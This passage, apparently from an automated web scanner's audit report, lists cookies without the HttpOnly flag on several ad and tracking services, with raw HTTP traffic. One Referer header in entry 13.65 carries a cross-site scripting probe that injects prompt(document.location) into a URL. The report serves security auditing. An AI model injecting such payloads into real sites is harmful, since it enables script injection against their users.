Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:46:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=74:1655:1209:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 06 Sep 2011 17:05:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=74:1655:1209:221:0:51011:1315328750:B2|74:1655:721:221:0:51011:1315328750:B2|74:1655:1205:221:0:51011:1315328750:B2; expires=Fri, 07-Oct-2011 17:05:50 GMT; path=/
Location: //ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_0Setup.png
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

13.63. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!#O!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gZi!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 15:32:13 GMT
BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?adv=274138&code=4X7ERY5MVFDBLHMTRJRP2G_n&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; liday1=fh'jT*YKlx8SkUshG%Lm!79C8vK!a(; ih="b!!!!0!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r#BKZI)BgvR/4M6EqoyOxB!!w[/!79C8#8K*x; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; lifb=0EA2)A9.-B!6-Nb'W00AM5Jkn/>M1M:>Rmw; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#O!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gZi!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 15:32:13 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 15:32:13 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

13.64. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.65. http://ads.rnmd.net/getAds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.rnmd.net
Path:	/getAds

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getAds?delivery=jsonp&adType=banner&adDiv=rnmdad&appId=cnbc_web&t=other,OFFDECK&w=300&h=50&v=1&ck=1315339668282 HTTP/1.1
Host: ads.rnmd.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.cnbc.com/mytestc3e92%27-prompt(document.location)-%27f261e685920/ipecho.php

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:47 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
x-rnmd-pc: 208.91.189.56
Content-Type: application/x-javascript
Content-Length: 665
Set-Cookie: personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:48 GMT
Connection: close

net.rnmd.sdk._private.JsonHelper.completeRequest({"personCookie":"208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8","adDiv":"rnmdad","htmlPayload":"<div style=\"text-align: center\">\r\n<a href=\"ht
...[SNIP]...

13.66. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KV1QisJqhCw3Caj5XcunNcMDa7Re6IGD4lAPKWdnq4jBRAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtS8UYaNROq1hKa5pT7PlEtIEVUJBxdqAyA9AgipxBis0MPBYw4RisMnVT081fJFlZ0k4MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.67. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

guest_id=v1%3A131532875890927681; domain=.twitter.com; path=/; expires=Fri, 06 Sep 2013 05:05:58 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.68. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 14:56:57 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.69. http://c.statcounter.com/t.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0; expires=Sun, 04-Sep-2016 15:35:46 GMT; path=/; domain=.statcounter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.70. http://clk.fetchback.com/serve/fb/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/serve/fb/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
cre=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
clk=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.71. http://clk.fetchback.com/serve/fb/engmnt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/serve/fb/engmnt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/engmnt HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 17:06:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2

13.72. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

